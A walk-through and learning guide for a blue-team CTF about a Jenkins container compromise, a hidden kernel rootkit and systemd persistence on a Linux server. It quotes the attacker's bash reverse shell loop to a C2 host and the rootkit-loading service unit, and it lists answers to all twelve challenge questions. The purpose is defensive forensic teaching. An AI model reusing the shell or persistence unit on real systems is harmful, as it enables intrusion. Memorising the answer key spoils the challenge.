Platform: CyberDefenders | Category: Blue Team CTF | Date: March 2026
Challenge Link: ContainerBreak: Rootkit Trail on CyberDefenders
This document serves two purposes. First, it is a complete walk-through of the ContainerBreak: Rootkit Trail CTF challenge on CyberDefenders. Second, it is a learning guide. Each section explains not just what the answer is, but why you look there, what the artifact means, and what to consider in a real investigation. The theory sections (Part 1) provide the foundational knowledge needed to understand the investigation. Read Part 1 before Part 2.
PART 1: FOUNDATIONAL THEORY
What you need to know before you open the evidence
Topic 1: Linux Filesystem and Log Architecture
The Filesystem Hierarchy
Linux follows a standard called the Filesystem Hierarchy Standard (FHS). Every directory has a defined purpose. Knowing the layout tells you where to look for evidence before you start searching.
| Directory | Forensic Purpose |
|---|---|
/var/log |
Primary log directory. Contains syslog, auth.log, kern.log, and application logs. |
/var/log/auth.log |
Authentication events. SSH logins, sudo usage, user creation. |
/var/log/kern.log |
Kernel messages. Module loads, driver events, kernel errors. |
/etc |
System configuration files. User accounts, SSH config, cron jobs, services. |
/etc/passwd |
User account database. All accounts including service accounts. |
/etc/shadow |
Password hashes. Shows when passwords were last changed. |
/etc/crontab |
Scheduled tasks. Common persistence mechanism. |
/tmp and /dev/shm |
Temporary storage. World-writable. Attackers stage tools here. /dev/shm is RAM-backed and leaves no disk trace. |
/home and /root |
User home directories. Contains .bash_history, SSH keys, personal configuration. |
/proc |
Virtual filesystem. Live process info, network connections, system state. Not on disk. |
/sys/module |
Virtual filesystem. One directory per loaded kernel module. Persists even when a rootkit removes its module list entry. |
/lib/modules |
Kernel module files organized by kernel version. Standard location for .ko files. |
The Three Logging Systems
Modern Linux systems run up to three separate logging systems simultaneously.
-
journald (
systemd-journald). Captures everything: kernel messages, service output, boot messages, and user sessions. Stores logs in binary format. Read withjournalctl. By default, logs may be volatile and lost on reboot. Check/etc/systemd/journald.conffor theStoragesetting. -
rsyslog (or
syslog-ng). The traditional syslog daemon. Receives messages and writes them to text files in/var/log/based on rules in/etc/rsyslog.conf. This creates files likeauth.logandkern.log. -
auditd. The Linux audit framework. Provides granular logging of system calls, file access, and user actions. Writes to
/var/log/audit/audit.log. Captures events that syslog and journald do not, including syscall-level activity.
The Event Flow
When an event occurs on a Linux system:
- The kernel or service generates a log message.
- journald captures the message first (if systemd is running).
- journald forwards the message to rsyslog (if configured).
- rsyslog writes the message to the appropriate text file.
- auditd independently captures syscall-level events to
audit.log.
Key Principle: Always check the logging configuration before trusting log content. If the attacker modified
/etc/rsyslog.confor stopped journald, logs may be incomplete. The configuration files are your first checkpoint.
Timestamps: mtime, atime, ctime
Every file on a Linux filesystem has three timestamps stored in its inode.
- mtime (Modify time): When the file content was last changed.
- atime (Access time): When the file was last read. Many systems mount with
noatime, reducing atime updates. - ctime (Change time): When the file metadata (permissions, ownership) was last changed. Cannot be set by normal user tools.
Key Principle — Timestomping Detection: Attackers can fake mtime and atime using the
touchcommand. They cannot fake ctime through normal means. If a file has a recent ctime but an old mtime, someone likely changed the file and then backdated the mtime. The ctime catches the lie.
Topic 2: How Kernel Rootkits Work
What a Kernel Rootkit Is
A kernel rootkit is malicious code that runs inside the operating system kernel. The kernel is the core of the OS. It controls processes, memory, files, network, and hardware access.
Code running in the kernel has the highest privilege level on the system. A rootkit at this level can hide processes, files, network connections, and itself from any tool running in userspace.
Loadable Kernel Modules (LKMs)
Linux allows code to be loaded into the running kernel at runtime. These are called Loadable Kernel Modules (LKMs). Legitimate uses include device drivers and filesystem drivers.
An attacker can write a malicious LKM and load it into the kernel. Once loaded, it runs with full kernel privileges. This is the most common method for deploying a kernel rootkit on Linux.
How an LKM Gets Loaded
- The attacker compiles a kernel module (
.kofile) matching the target kernel version. - The attacker gains root access (in this scenario, via container escape).
- The attacker loads the module using
insmodormodprobe. - The kernel calls
init_module, triggering the module’s initialization function. - The module runs inside the kernel with full privileges.
- The attacker deletes the
.kofile to remove the installation artifact.
Key Principle: The module runs in kernel memory even after the
.kofile is deleted from disk. Disk forensics may not find the module file. Memory forensics will find the loaded module.
Syscall Hooking: How the Rootkit Hides Things
A syscall (system call) is a request from a userspace program to the kernel. Every time a program reads a file, lists a directory, or opens a network connection, it makes a syscall. The kernel maintains a syscall table: an array of function pointers, one per syscall.
A rootkit hooks syscalls by replacing entries in this table with its own functions.
| Syscall | Normal Purpose | When Hooked |
|---|---|---|
getdents / getdents64 |
List directory contents | Hides files and directories from ls, find, and similar tools. |
read |
Read file contents | Can filter log entries or file contents in real time. |
open / openat |
Open files | Can prevent access to specific files or redirect reads. |
kill |
Send signals to processes | Can hide specific processes from signal-based enumeration. |
recvmsg |
Receive network messages | Can filter network data from monitoring tools. |
Self-Concealment
A well-written rootkit removes its own entry from the kernel’s linked list of loaded modules after loading. This means lsmod and /proc/modules will not show it. The module code remains in kernel memory and continues executing.
However, the /sys/module/ filesystem directory for the module often persists. This discrepancy between /sys/module/ and lsmod is the primary detection technique for hidden LKM rootkits.
MITRE ATT&CK Mapping
| Technique | ID | Relevance |
|---|---|---|
| Rootkit | T1014 | Kernel rootkit installation and syscall hooking for concealment. |
| Kernel Modules and Extensions | T1547.006 | Loading a malicious LKM for persistence. |
| Indicator Removal | T1070 | Deleting the .ko file after loading. Clearing logs. |
Topic 3: Container Escape Mechanics
What a Container Escape Is
A container escape is when an attacker breaks out of a container’s isolation boundary and gains access to the underlying host system.
Containers are not virtual machines. They share the host’s kernel. The isolation is provided by Linux kernel features: namespaces (what a process can see) and cgroups (what resources it can use). A container escape exploits a weakness in this isolation.
How Container Isolation Works
Namespaces control what a process can see. A container gets its own PID namespace (it sees only its own processes), mount namespace (it sees only its own filesystem), and network namespace (it has its own network stack).
Cgroups control what resources a process can use: CPU, memory, I/O limits. They do not provide security isolation. They provide resource management only.
The shared kernel is the critical detail. Every container on a host runs on the same kernel. If the kernel has a vulnerability, any container can potentially exploit it. The container boundary is a kernel-enforced policy. A kernel bug can break that policy.
Common Container Escape Methods
- Kernel Exploitation. The attacker exploits a vulnerability in the shared kernel from inside the container. A kernel exploit gives the attacker host-level kernel access. This is the most relevant method for this scenario.
- Privileged Container Abuse. If a container runs with
--privileged, it has nearly unrestricted access to host devices and capabilities. An attacker can mount the host filesystem or load kernel modules without needing a kernel exploit. - Misconfigured Mounts. If
/var/run/docker.sockis mounted into a container, the attacker can create new privileged containers or access the host filesystem. - Capability Abuse. Certain capabilities like
CAP_SYS_ADMINorCAP_SYS_PTRACEcan be abused for escape if granted to the container.
Artifacts of a Container Escape
| Artifact | Location | What It Shows |
|---|---|---|
| Container overlay filesystem | /var/lib/docker/overlay2/ |
Files placed inside the container. Exploit binaries, tools, scripts. |
| Kernel logs | /var/log/kern.log, journalctl -k |
Kernel exploitation artifacts. Crash dumps, unexpected module loads. |
| Audit logs | /var/log/audit/audit.log |
Syscall-level events. init_module calls, capability usage. |
| Docker daemon logs | /var/lib/docker/containers/ |
Container-level activity. Command execution, error messages. |
| Process artifacts | /proc (live) or memory dump |
Processes that originated in a container namespace but operate in the host namespace. |
Key Principle — The Golden Period: The time gap between the container escape and the rootkit load is the golden period. The attacker had root but no rootkit yet. Logs from this window are trustworthy because the rootkit was not yet active to filter them.
MITRE ATT&CK Mapping
| Technique | ID | Relevance |
|---|---|---|
| Escape to Host | T1611 | Container escape to host system. |
| Exploitation for Privilege Escalation | T1068 | Kernel or service exploit used to break container isolation. |
| Exploitation of Remote Services | T1210 | If the initial container compromise came from a network service. |
Topic 4: The Trust Problem
The Core Paradox
When a kernel rootkit is active, it controls the operating system. Every tool you run on that system asks the kernel for information. The kernel lies.
Standard commands like ps, ls, netstat, lsmod, and find cannot be trusted. The rootkit intercepts the requests these tools make and filters the results before they reach you. You will see exactly what the attacker wants you to see.
How It Works
Standard Linux tools operate in userspace. They make system calls (syscalls) to the kernel to get data.
A kernel rootkit hooks these syscalls. It intercepts the request, checks the real answer, removes anything it wants to hide, and returns the filtered answer. The program never knows the data was altered.
What Happens When You Run ps aux
- You run
ps auxto list processes. psmakes a syscall to read/proc.- The rootkit intercepts the read.
- The rootkit removes its hidden processes from the result.
psshows you a clean process list.- The hidden processes keep running.
What to Do About It
If you cannot trust the live system, get your evidence from sources the rootkit cannot control.
Approach 1: Memory Forensics. Acquire a full memory dump using LiME. Analyze it offline with Volatility. Memory analysis reads raw kernel structures directly. It does not ask the kernel to report on itself.
Approach 2: Disk Forensics on a Mounted Image. Take the disk image offline. Mount it read-only on a clean analysis workstation. The rootkit is not running on your analysis machine. Files the rootkit hid from ls on the live system will be visible.
Approach 3: Cross-Referencing. Compare what the live system reports against what raw evidence shows. Every discrepancy between what the live system claimed and what raw analysis reveals is a rootkit artifact.
Key Principle: Never trust the compromised system to tell the truth about itself. Always verify live findings against raw evidence sources the rootkit cannot control.
Topic 5: Linux Memory Forensics
What Memory Forensics Is
Memory forensics is the acquisition and analysis of a system’s volatile memory (RAM). Volatile memory contains everything the system is actively doing: running processes, open network connections, loaded kernel modules, encryption keys, and injected code.
When the system powers off, this data is lost. That is why it is called volatile.
Memory is the one evidence source a kernel rootkit cannot fully control after acquisition. In a raw memory dump analyzed offline, the kernel’s internal data structures are exposed exactly as they exist.
LiME: Acquiring Memory
LiME (Linux Memory Extractor) is the standard tool for Linux memory acquisition. LiME is a loadable kernel module itself. You compile it for the target system’s exact kernel version, load it, and it reads physical memory directly.
- Compile LiME for the target kernel version (must match exactly).
- Load the LiME module on the target system.
- LiME reads physical RAM and writes it to a file or streams it over TCP.
- Transfer the dump to your analysis workstation.
Volatility: Analyzing the Dump
Volatility is the primary framework for Linux memory forensics. It reads the raw memory dump and understands the kernel’s internal data structures. It needs a profile (Volatility 2) or symbol table (Volatility 3) that matches the exact kernel version.
| Plugin | Purpose | Scenario Relevance |
|---|---|---|
linux.pslist |
Lists running processes from the kernel’s task list. | Find processes hidden from ps on the live system. |
linux.pstree |
Shows processes in parent-child tree. | Spot suspicious process relationships. |
linux.check_modules |
Compares module list against modules in memory. | Finds the hidden rootkit module removed from lsmod. |
linux.lsmod |
Lists loaded kernel modules from memory. | Compare against live lsmod output to find discrepancies. |
linux.sockstat |
Lists network connections from memory. | Find hidden network connections the rootkit concealed. |
linux.bash |
Recovers bash command history from memory. | Find attacker commands even if .bash_history was cleared. |
linux.check_syscall |
Examines the syscall table for modifications. | Direct evidence of rootkit activity. Modified pointers indicate syscall hooks. |
Key Principle: If you use the wrong profile or symbol table, Volatility cannot parse the dump. This is the most common failure point in Linux memory forensics. Always verify the kernel version from the disk image first.
PART 2: THE INVESTIGATION
ContainerBreak: Rootkit Trail — Full Walk-Through
The Forensic Collection
What We Are Working With
The evidence is a UAC (Unix Artefact Collector) collection taken from a live compromised Linux server. The collection was made while the rootkit was still active.
This is important. Some live command output in the collection may have been filtered by the rootkit at the time of collection. We cross-reference multiple artifact sources throughout the investigation.
| Folder | Contents |
|---|---|
[root] |
Mirror of the host filesystem. Contains /etc, /var/log, /lib/modules, and all other system directories. |
live_response |
Output of live commands captured at collection time. Sub-folders: system (OS info), process (process lists), and more. |
hash_executables |
MD5 and SHA1 hashes of executables found on the system. |
bodyfile |
Filesystem metadata including MAC timestamps for timeline analysis. |
uac.log |
Collection tool log. Records what was captured and when. |
Reading This Collection: [root] is a filesystem snapshot. live_response is command output captured while the system was running. When the rootkit was active, live commands may return filtered results. Always cross-reference both sources.
The Attack Chain
Overview
Before answering individual questions, it helps to understand the full attack from beginning to end. This shapes your triage order and tells you what to look for at each stage.
| Stage | What Happened | How | Key Artifact |
|---|---|---|---|
| 1. Initial Access | Attacker accessed Jenkins web application | Jenkins exposed on port 8080 with CSRF protection disabled | ps_auxwwwf.txt |
| 2. Initial Shell | Reverse shell from inside the Jenkins container | bash -i to 185.220.101.50:4444 as natsuiro_xcn |
ps_auxwwwf.txt |
| 3. Container Escape | Attacker broke out of the container to the host | Exploited container isolation to gain host root | Process tree, host process ownership |
| 4. Rootkit Install | Malicious LKM loaded into the host kernel | insmod sysperf.ko on host |
kern.log, /sys/module, taint value |
| 5. Persistence | Systemd service created to reload rootkit on boot | sysperf.service calling insmod at startup |
sysperf.service file |
| 6. C2 Shell | Persistent reverse shell loop running as root | while true bash loop to 185.220.101.50:9999 |
ps_auxwwwf.txt PID 39303 |
Stage 1 and 2: Initial Access and Container Shell
What the Evidence Shows
The process tree in live_response/process/ps_auxwwwf.txt shows a Jenkins application running inside a Docker container. The container was accessible over the network.
What the Configuration Tells Us
Two flags in the Jenkins startup command are forensically significant.
-Djenkins.install.runSetupWizard=false: The setup wizard was skipped. Jenkins was configured to start in an accessible state without requiring initial setup.-Dhudson.security.csrf.GlobalCrumbIssuerConfiguration.DISABLE_CSRF_PROTECTION=true: CSRF protection was explicitly disabled. This is a known attack enabler. It allows attackers to execute Jenkins scripts remotely without a valid CSRF token.
These flags did not appear by accident. This was a deliberately misconfigured Jenkins instance, likely used as a development or testing environment. That misconfiguration was the attacker’s entry point.
The Initial Reverse Shell
The process tree shows a bash reverse shell spawned as a child of the Java process:
This shell ran as the natsuiro_xcn user inside the Jenkins container. At this stage, the attacker had access to the container environment but not the host.
The attacker connected to 185.220.101.50 on port 4444. This is the same C2 server that later received the root-level persistent shell on port 9999.
What This Means for the Investigation
The initial access came through Jenkins, not through SSH or a direct host exploit. The attack began inside a container, which means the attacker needed to escape the container to reach the host.
This sets up Stage 3.
Stage 3: Container Escape
How We Know an Escape Occurred
The process tree shows the critical transition. The initial shell ran as natsuiro_xcn inside the container namespace. But subsequent activity shows root-owned processes running in the host namespace.
Looking at the process tree around PID 24860:
This sudo/su chain ran from the natsuiro_xcn SSH session at 23:14. The attacker escalated from natsuiro_xcn to root. This is consistent with a privilege escalation that also broke the container boundary.
Evidence of the Escape in the Process Tree
After the container escape, the attacker had processes running as root in the host namespace. The ps_auxwwwf.txt shows multiple root-owned bash processes that are not associated with any legitimate service.
The process at PID 39303 is the clearest evidence:
This process runs as root. It was started from a host-level context, not from inside the Jenkins container. If the attacker had not escaped the container, this process would run as natsuiro_xcn.
The Transition Timeline
From kern.log and the process data:
- 23:15: Second system boot. System comes up. Kernel
5.4.0-216-genericactive. - 23:16: Attacker’s initial container shell established (PIDs 24903, 24904 as
natsuiro_xcn). - 23:31:36: Rootkit (
sysperf) loaded into the host kernel. Attacker is already root on the host by this point.
The approximately 15-minute window between the container shell and the rootkit load is the golden period. The attacker was operating as root on the host but had not yet installed the rootkit. Log entries from this window are trustworthy.
What to Consider in a Real Investigation
Container Escape Forensics: In a full investigation, you would also examine /var/lib/docker/overlay2/ to find files the attacker placed inside the container before the escape. Exploit binaries, tools, and scripts are often staged in /tmp inside the container. These files persist in the overlay layers even after the container stops.
What We Could Not Determine: The exact exploit used for the container escape was not confirmed in this investigation. The evidence shows the result (root on host) but not the specific escape technique. A full investigation would examine the Docker daemon logs, container capability configuration, and any kernel error messages from the escape period.
Discovery Questions (Q1–Q3)
Q1: Kernel Version
Question
What is the exact kernel version of the compromised Ubuntu server?
Where to Look
For a UAC collection, go to live_response/system/. The file uname_-a.txt contains output from uname -a, which reports the kernel version as seen by the running system at collection time.
A Complication
In this case, the journal boot messages showed a different kernel version (6.8.0-1013-aws) than uname reported (5.4.0-216-generic). This happened because the journal contained entries from an earlier boot on a different kernel.
The uname -a output reflects what was actually running at collection time. For forensic questions about the state of the compromised system, this is the authoritative source.
Answer
| Field | Value |
|---|---|
| Kernel Version | 5.4.0-216-generic |
| Artifact | live_response/system/uname_-a.txt |
Q2: Hostname
Question
What is the hostname of the compromised system?
Where to Look
The hostname is stored at /etc/hostname on every Linux system. In the collection this is [root]/etc/hostname.
The hostname can be cross-referenced against the collection folder name (uac-wowza-linux-...) and against the journal log lines which prefix each entry with the system hostname.
Answer
| Field | Value |
|---|---|
| Hostname | wowza |
| Artifact | [root]/etc/hostname |
Q3: Kernel Taint Value
Question
What is the current kernel taint value at the time of collection?
What a Taint Value Means
The Linux kernel maintains a taint flag: a bitmask where each bit represents a condition that makes the kernel state less trusted. Loading an unsigned, externally built module sets specific taint bits.
A value of 12288 has two bits set: bit 12 (proprietary module loaded, value 4096) and bit 13 (out-of-tree module loaded, value 8192). This is consistent with a rootkit compiled externally and loaded manually.
Where to Look
The file live_response/system/cat_proc_sys_kernel_tainted.txt contains the taint value from /proc/sys/kernel/tainted.
Answer
| Field | Value |
|---|---|
| Taint Value | 12288 |
| Meaning | Proprietary module + Out-of-tree module loaded |
| Artifact | live_response/system/cat_proc_sys_kernel_tainted.txt |
Rootkit Discovery (Q4–Q7)
Q4: Malicious Module Name
Question
A malicious kernel module was loaded on the compromised machine. What is the name of this module?
The Detection Technique
A rootkit removes its own entry from the kernel’s linked list of loaded modules. This makes it invisible to lsmod and /proc/modules. However, when a module loads, the kernel creates a directory for it in /sys/module/. This directory often persists even after the linked list entry is removed.
Comparing these two sources reveals hidden modules.
How to Compare
Both sources are in the collection:
live_response/system/ls_-la_sys_module.txt: directory listing of/sys/module/live_response/system/lsmod.txt: output oflsmodcommand
To compare efficiently, extract just the module names from each file and diff them:
awk '{print $NF}' ls_-la_sys_module.txt | sort > sys_clean.txt
awk '{print $1}' lsmod.txt | sort > lsmod_clean.txt
diff sys_clean.txt lsmod_clean.txt
The name sysperf appeared in /sys/module/ but not in lsmod. This is the hidden rootkit module.
The module identified itself as SysPerfMon in kernel log messages, disguised as a “System Performance Monitoring Service”. The filename on disk was sysperf.ko.
Answer
| Field | Value |
|---|---|
| Module Name | sysperf |
| Display Name | SysPerfMon (System Performance Monitoring Service) |
| Artifacts | live_response/system/ls_-la_sys_module.txt vs lsmod.txt |
Q5: dmesg Timestamp of Module Load
Question
At what dmesg timestamp was the rootkit module first loaded?
What a dmesg Timestamp Is
The kernel ring buffer uses timestamps measured in seconds since the kernel started booting. The format is seconds.microseconds. These are relative times, not wall-clock times.
Where to Look
The file live_response/system/modules_tainting_the_kernel_dmesg.txt contains kernel log entries related to module tainting. It shows two entries for sysperf:
The first entry marks when the module load began. The signature verification failure is a separate event, logged 782 microseconds later.
Answer
| Field | Value |
|---|---|
| dmesg Timestamp | 9127.292300 |
| Artifact | live_response/system/modules_tainting_the_kernel_dmesg.txt |
Q6: Absolute UTC Timestamp of Rootkit Load
Question
What is the absolute UTC timestamp when the rootkit was loaded?
The Direct Approach
rsyslog records kernel messages to /var/log/kern.log with real wall-clock timestamps. This is faster and more reliable than calculating from the dmesg offset.
In [root]/var/log/kern.log:
The wall-clock timestamp is directly readable: November 24, 2025 at 23:31 UTC.
The Trust Consideration
kern.log was written by rsyslog on the live system. A rootkit could theoretically modify log entries. In a full investigation, you would cross-reference this timestamp against the binary journal (read with journalctl -D) and any memory dump artifacts.
For this collection, the kern.log timestamp was not tampered with, as confirmed by the CTF answer.
The Calculation Approach (When kern.log Is Unavailable)
If kern.log had been deleted: add the dmesg offset (9127 seconds = 2 hours, 32 minutes, 7 seconds) to the exact boot time. The second boot started at 2025-11-21 23:15:53 UTC per journalctl --list-boots. However, the sysperf load occurred during a later session (Nov 24), making this calculation significantly more complex.
Answer
| Field | Value |
|---|---|
| UTC Timestamp | 2025-11-24 23:31 |
| Artifact | [root]/var/log/kern.log |
Q7: C2 Server IP and Port
Question
What C2 server IP address and port are configured in the rootkit?
Where to Look
When a kernel module loads, its initialization function may print messages to the kernel ring buffer. These appear in kern.log and in journalctl output.
The sysperf rootkit logged its C2 configuration on initialization:
What This Tells Us
This is an operational security failure by the attacker. The rootkit logged its own C2 address. This likely happened because the developer expected the attacker to clean up kern.log after installation. In this case, the log was preserved in the UAC collection.
The IP address 185.220.101.50 is a known Tor exit node. This is consistent with an attacker routing traffic through Tor to obscure their origin.
Answer
| Field | Value |
|---|---|
| C2 IP and Port | 185.220.101.50:9999 |
| Artifact | [root]/var/log/kern.log |
Persistence (Q8–Q9)
Q8: Systemd Service File Path
Question
The threat actor created a systemd service to maintain persistence. What is the full path to this service file?
Where to Look
Attackers commonly create systemd service units for persistence. These files live in /etc/systemd/system/ on the host filesystem.
In the collection: [root]/etc/systemd/system/. A file named sysperf.service was present, matching the rootkit module name.
What Systemd Persistence Means
A service unit in /etc/systemd/system/ that is enabled runs on every boot. Even if the rootkit is cleared from memory, a reboot will reload it automatically unless this file is also removed.
This is a two-step remediation requirement: disable the service and remove the module file. Doing only one is insufficient.
Answer
| Field | Value |
|---|---|
| Service File Path | /etc/systemd/system/sysperf.service |
| Artifact | [root]/etc/systemd/system/sysperf.service |
Q9: ExecStart Command in Service File
Question
The systemd service file specifies a command to run upon startup. What is the exact command?
Reading the Service File
The full sysperf.service content:
[Unit]
Description=System Performance Monitoring Service
After=network.target
DefaultDependencies=no
[Service]
Type=oneshot
ExecStart=/sbin/insmod /lib/modules/sysperf.ko
RemainAfterExit=yes
StandardOutput=null
StandardError=null
[Install]
WantedBy=multi-user.target
What Each Field Tells Us
ExecStart=/sbin/insmod /lib/modules/sysperf.ko: Usesinsmodto load the rootkit kernel module from/lib/modules/sysperf.koon every boot.StandardOutput=null/StandardError=null: Suppresses all output. This prevents the insmod activity from appearing in the systemd journal.Type=oneshot+RemainAfterExit=yes: The service runs once and exits. Systemd considers it active even after the command completes.DefaultDependencies=no: The service starts as early as possible in the boot sequence, before most other services.
Note: The module is stored in /lib/modules/ instead of the standard path /lib/modules/[kernel-version]/. This is a deliberate deviation from convention to avoid detection tools that scan the standard kernel module paths.
Answer
| Field | Value |
|---|---|
| ExecStart Command | /sbin/insmod /lib/modules/sysperf.ko |
| Artifact | [root]/etc/systemd/system/sysperf.service |
Reverse Shell and Rootkit Hash (Q10–Q12)
Q10: PID of Reverse Shell Loop Process
Question
The systemd service persistence results in a root-owned process that maintains a reverse shell loop. What is the PID of this process?
Where to Look
Process information lives in live_response/process/. The key file is ps_auxwwwf.txt: a full process tree with complete command lines.
Because we know the C2 IP (185.220.101.50) and port (9999), we can search for it directly:
PID 39303 is the parent process maintaining the loop. PID 40565 is a child process spawned by the loop. The question asks for the persistent loop process: 39303.
The Trust Angle
The file hidden_pids_for_ps_command.txt shows only one PID: 113064. This PID does not appear in ps_auxwwwf.txt at all, meaning it was completely hidden from the standard process list. The process at PID 39303 was not hidden from ps, suggesting the rootkit did not configure itself to hide this specific process. This is another indicator of incomplete operational security.
Answer
| Field | Value |
|---|---|
| Process PID | 39303 |
| Artifact | live_response/process/ps_auxwwwf.txt |
Q11: Full Reverse Shell Command
Question
What is the full command line of the persistent reverse shell?
The Command
while true; do bash -i >& /dev/tcp/185.220.101.50/9999 0>&1; sleep 30; done
Breaking Down the Command
while true; do ... done: An infinite loop that runs forever.bash -i: Starts an interactive bash shell. The-iflag enables job control and interactive features.>& /dev/tcp/185.220.101.50/9999: Redirects both stdout (1) and stderr (2) to a TCP connection to the C2 server on port 9999.0>&1: Redirects stdin (0) to come from the same TCP connection. This creates a bidirectional shell.sleep 30: Waits 30 seconds before reconnecting if the connection drops. This makes the shell resilient to network interruptions.
This is a standard bash reverse shell loop. It requires no additional tools beyond bash itself. All network connectivity uses bash’s built-in /dev/tcp feature, which does not require netcat or other utilities.
Answer
| Field | Value |
|---|---|
| Full Command | while true; do bash -i >& /dev/tcp/185.220.101.50/9999 0>&1; sleep 30; done |
| Artifact | live_response/process/ps_auxwwwf.txt |
Q12: SHA256 Hash of Rootkit Module
Question
What is the SHA256 hash of the rootkit kernel module?
Where to Look
The hash_executables folder contains MD5 and SHA1 hashes of standard executables. It does not contain the rootkit module because it targets binaries in standard executable paths, not kernel modules.
The sysperf.ko file exists in the collection at [root]/lib/modules/sysperf.ko. Calculate the SHA256 hash directly:
sha256sum '[root]/lib/modules/sysperf.ko'
Why This Matters
A SHA256 hash uniquely identifies a specific build of the rootkit. This hash can be submitted to threat intelligence platforms such as VirusTotal or MalwareBazaar to check whether this rootkit is a known tool, who has used it before, and whether behavioral analysis exists.
It also serves as an IOC. If this hash appears on another system in your environment, you have immediate confirmation that the same rootkit was deployed there.
Answer
| Field | Value |
|---|---|
| SHA256 | ded20890c28460708ea1f02ef50b6e3b44948dbe67d590cc6ff2285241353fd8 |
| Artifact | [root]/lib/modules/sysperf.ko |
PART 3: REFERENCE MATERIAL
Complete answers, IOCs, timeline, and key lessons
Complete Answer Summary
| Q | Question | Answer |
|---|---|---|
| 1 | Kernel version | 5.4.0-216-generic |
| 2 | Hostname | wowza |
| 3 | Kernel taint value | 12288 |
| 4 | Malicious kernel module name | sysperf |
| 5 | dmesg timestamp of rootkit load | 9127.292300 |
| 6 | Absolute UTC timestamp of rootkit load | 2025-11-24 23:31 |
| 7 | C2 IP and port | 185.220.101.50:9999 |
| 8 | Systemd service file path | /etc/systemd/system/sysperf.service |
| 9 | ExecStart command | /sbin/insmod /lib/modules/sysperf.ko |
| 10 | PID of reverse shell loop | 39303 |
| 11 | Full reverse shell command | while true; do bash -i >& /dev/tcp/185.220.101.50/9999 0>&1; sleep 30; done |
| 12 | SHA256 of rootkit module | ded20890c28460708ea1f02ef50b6e3b44948dbe67d590cc6ff2285241353fd8 |
Indicators of Compromise
| Type | Value | Description |
|---|---|---|
| IP:Port | 185.220.101.50:9999 |
C2 server. Root-level persistent reverse shell destination. |
| IP:Port | 185.220.101.50:4444 |
C2 server. Initial container reverse shell destination. |
| SHA256 | ded20890c28460708ea1f02ef50b6e3b44948dbe67d590cc6ff2285241353fd8 |
sysperf.ko rootkit kernel module. |
| File | /lib/modules/sysperf.ko |
Rootkit module binary. Non-standard location. |
| File | /etc/systemd/system/sysperf.service |
Persistence service. Reloads rootkit on every boot. |
| Module Name | sysperf / SysPerfMon |
Kernel module name and display name used by the rootkit. |
| Kernel Taint | 12288 |
Kernel taint value indicating out-of-tree and proprietary module loaded. |
Chronological Timeline
| Timestamp (UTC) | Event | Artifact Source |
|---|---|---|
| 2025-11-21 23:05 | First system boot | utmpdump_var_log_wtmp.txt |
| 2025-11-21 23:15 | System rebooted. Second boot begins. | utmpdump_var_log_wtmp.txt |
| 2025-11-21 23:15:53 | Kernel 5.4.0-216-generic starts. Boot index 0 begins. |
journalctl --list-boots |
| 2025-11-24 23:14 | SSH session from 192.168.192.1 as natsuiro_xcn |
utmpdump_var_log_wtmp.txt |
| 2025-11-24 23:15 | Attacker escalates to root via sudo su |
ps_auxwwwf.txt (PID 24844, 24859, 24860) |
| 2025-11-24 23:16 | Container reverse shell established to 185.220.101.50:4444 |
ps_auxwwwf.txt (PID 24903) |
| 2025-11-24 23:31:36 | Rootkit sysperf loaded into kernel |
kern.log, modules_tainting_the_kernel_dmesg.txt |
| 2025-11-24 23:31:36 | Kernel tainted (value 12288) | cat_proc_sys_kernel_tainted.txt |
| 2025-11-24 23:31:36 | C2 address logged: 185.220.101.50:9999 |
kern.log |
| 2025-11-24 23:31 | sysperf.service created for boot persistence |
sysperf.service (ctime) |
| 2025-11-24 23:31 | Root reverse shell loop started (PID 39303) | ps_auxwwwf.txt |
| 2025-11-24 23:36:52 | UAC forensic collection performed | journalctl --list-boots, uac.log |
Key Investigation Lessons
1. Cross-Reference Multiple Sources
A rootkit filters live system output. Never rely on a single source.
/sys/module/vslsmod: for hidden kernel modules.kern.logvs dmesg offset: for event timestamps.psoutput vs process directory: for hidden processes.[root]filesystem vslive_response: for modified configuration files.
2. Check kern.log Before Calculating from dmesg
The dmesg offset requires knowing which boot the event occurred in and the exact boot start time. kern.log provides the same information as a direct wall-clock timestamp.
Always check kern.log first. Use the dmesg calculation only when kern.log has been deleted or tampered with.
3. Rootkits Sometimes Log Their Own Activity
The sysperf rootkit logged its C2 address to kern.log on load. Always read kernel log messages from the time a suspicious module loaded. The module initialization function may print diagnostic information that the attacker forgot to clean up.
4. Persistence Is Always Layered
The attacker used two persistence mechanisms: the systemd service (survives reboots) and the reverse shell loop (survives connection drops). Remediation must address both. Removing the rootkit from memory without removing the service file means it returns on the next reboot.
5. The /sys/module vs lsmod Technique Is Reliable
This is the primary live detection technique for hidden LKM rootkits. It works because /sys/module/ is a filesystem and the rootkit typically only removes its linked list entry, not the /sys/module/ directory.
This technique works on forensic collections and on live systems. It does not require memory forensics tools.
6. The Golden Period
The time between the container escape and rootkit load is forensically valuable. The attacker had root but no rootkit filtering. Log entries from this window are trustworthy. Always identify this window and examine its logs first.
7. Jenkins Misconfigurations Are a Common Entry Point
CSRF protection disabled and setup wizard skipped are both deliberate configuration choices. In real environments, verify Jenkins configuration files for these flags. Both should be absent in a production deployment.
What This Document Does Not Cover
Adjacent Techniques You Should Know Exist
- eBPF Rootkits: Malicious programs loaded via the
bpf()syscall. They do not require a kernel module. Standardlsmodvs/sys/module/detection will miss them. Usebpftoolto enumerate loaded eBPF programs. - Ftrace Hooking: Uses the kernel’s built-in function tracing framework to intercept kernel functions without modifying the syscall table. More stealthy than syscall table hooking on modern kernels with write protection enabled.
- Userland Rootkits: Operate in userspace by replacing system binaries or using
LD_PRELOADinjection. Do not require kernel access. Detected differently from LKM rootkits. - Memory Forensics with Volatility: This investigation used static artifact analysis. A full memory dump analyzed with Volatility would have provided direct evidence of hooked syscalls, hidden process task structures, and the rootkit code itself in memory. That analysis is not performed here.
- Container Overlay Filesystem Analysis: The attacker staged tools inside the Jenkins container before the escape. The container overlay layers at
/var/lib/docker/overlay2/were not analyzed in this write-up. Those layers may contain exploit binaries and tools used during the intrusion. - Network Capture Analysis: A pcap file was present in the collection (referenced in
ps_auxwwwf.txtviatcpdump). Analysis of network traffic would provide additional evidence of attacker communication patterns. - Kernel Exploit Identification: The exact container escape exploit was not confirmed. A deeper investigation would involve analyzing kernel error messages, container capability configuration, and the deleted executable at
/proc/11324/exe.
Why These Are Not in This Document
This document covers the artifacts and techniques needed to answer the 12 CTF questions plus the container escape analysis visible in the process tree. The adjacent topics above require additional tools or evidence sources not available in the collection provided.
Where to Go Next
- Volatility Foundation (volatilityfoundation.org): Linux memory forensics plugins for rootkit detection and syscall hook analysis.
